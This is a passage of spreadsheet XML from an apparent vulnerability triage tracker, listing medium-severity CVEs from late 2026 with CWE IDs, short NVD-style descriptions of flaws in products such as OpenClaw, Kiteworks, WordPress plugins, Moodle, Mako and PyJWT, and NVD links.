        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1-3 contains a missing authorization vulnerability in NodeService capture handlers that allows connected gateways or agents to perform screen snapshots, camera snaps, and location captures without consent prompts. Attackers can invoke screen.snapshot, camera.snap, and location.get over the node WebSocket to silently capture screenshots, photograph users through webcams, and obtain device geolocation without user interaction.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101879</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101881</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an allocation of resources without limits vulnerability in the gateway WebSocket transport that allows connected gateways to exhaust node memory. Attackers can send an unending sequence of WebSocket continuation frames without EndOfMessage to cause unbounded memory growth until the node process crashes.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101881</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102124</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-670</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>A Kiteworks appliance setup interface did not enforce authentication once the appliance had completed initial configuration. An unauthenticated attacker with network access to the appliance could read and modify a limited set of setup records, including a contact name and email address captured during initial configuration.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102124</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102139</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="inlineStr"/>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>An authorization check in the large file exchange feature of Kiteworks Email Protection Gateway did not correctly establish that the requesting user was a party to the package being requested. An authenticated user of that optional feature could read the subject, message body, and attachments of packages they neither sent nor received.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102139</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102146</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>An authenticated Email Protection Gateway administrator holding only limited, delegated permissions could write files with attacker-controlled content to arbitrary locations accessible to the Email Protection Gateway service account. This exceeds the administrator's intended privileges and could be used to alter application files and configuration or to disrupt the availability of the service.</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102146</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102375</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in Optimole &lt;= 4.2.14 versions.</t>
        </is>
      </c>
      <c r="T385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102375</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102386</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in WP Photo Album Plus &lt;= 9.3.02.003 versions.</t>
        </is>
      </c>
      <c r="T386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102386</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102397</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Ultimate Maps by Supsystic &lt;= 1.5.5 versions.</t>
        </is>
      </c>
      <c r="T387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102397</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102588</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. The XML grade import feature lacks proper Cross-Site Request Forgery (CSRF) token validation. By tricking an authenticated user with grade management permissions into visiting a malicious webpage, an attacker can trigger unauthorized requests on the victim's behalf. This flaw allows a remote attacker to set or overwrite student grades without authorization.</t>
        </is>
      </c>
      <c r="T388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102588</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102991</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr">
        <is>
          <t>express, python, gin</t>
        </is>
      </c>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t>Mako is a template library written in Python. Prior to 1.4.2, on Windows, TemplateLookup.get_template() in mako/lookup.py resolves template URIs with posixpath, while Template.__init__() in mako/template.py validates them with os.path, which uses ntpath. A URI beginning with a drive designator causes ntpath to absorb the traversal segments before the leading dot-dot check, while posixpath resolution can escape the configured template directory. An application that passes attacker-controlled template names or include paths can disclose process-readable files on the same volume, and a targeted file containing Mako template syntax may also be parsed and executed as a template. Raw URL paths are generally normalized before reaching this form, but query strings, form or JSON bodies, route parameters, and dynamic include expressions can preserve it. This issue is fixed in version 1.4.2.</t>
        </is>
      </c>
      <c r="T389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102991</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103001</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr">
        <is>
          <t>pip:PyJWT</t>
        </is>
      </c>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>CWE-471</t>
        </is>
      </c>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.11.0 through 2.13.0, PyJWT's PyJWT._merge_options() method can modify a caller-supplied mutable options mapping when verify_signature is false. If an application reuses that same mapping for a later decode() or decode_complete() call and changes verify_signature to true, the mapping can retain false values for expiration, not-before, issued-at, audience, issuer, subject, and JWT ID checks. A signed token with invalid registered claims can then be accepted without disabling signature verification, but applications that create a fresh options mapping for each call are not affected.</t>
        </is>
      </c>
      <c r="T390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103001</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103538</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in ZongXR SuperMarket 1.0.0.0. Affected by this issue is the function OrderController.deleteOrder of the file order/src/main/java/com/supermarket/order/controller/OrderController.java of the component Order Deletion Endpoint. Performing a manipulation of the argument orderId results in missing authentication. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103538</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103592</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t>simple-php-router through 5.4.1.7 contains an IP restriction bypass vulnerability in the IpRestrictAccess middleware that allows remote unauthenticated attackers to bypass IP whitelist and blacklist protections. Attackers can spoof X-Forwarded-For, CF-Connecting-IP, or Client-IP headers to impersonate whitelisted addresses or evade blacklists, gaining access to IP-restricted routes.</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103592</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16596</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t>The WP Directory Kit plugin for WordPress is vulnerable to generic SQL Injection via the 'data_fields_list' parameter in all versions up to, and including, 1.5.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16596</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62078</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Premium Addons for Elementor &lt;= 4.11.105 versions.</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62078</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62079</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Qi Addons For Elementor &lt;= 1.11 versions.</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62079</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62080</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
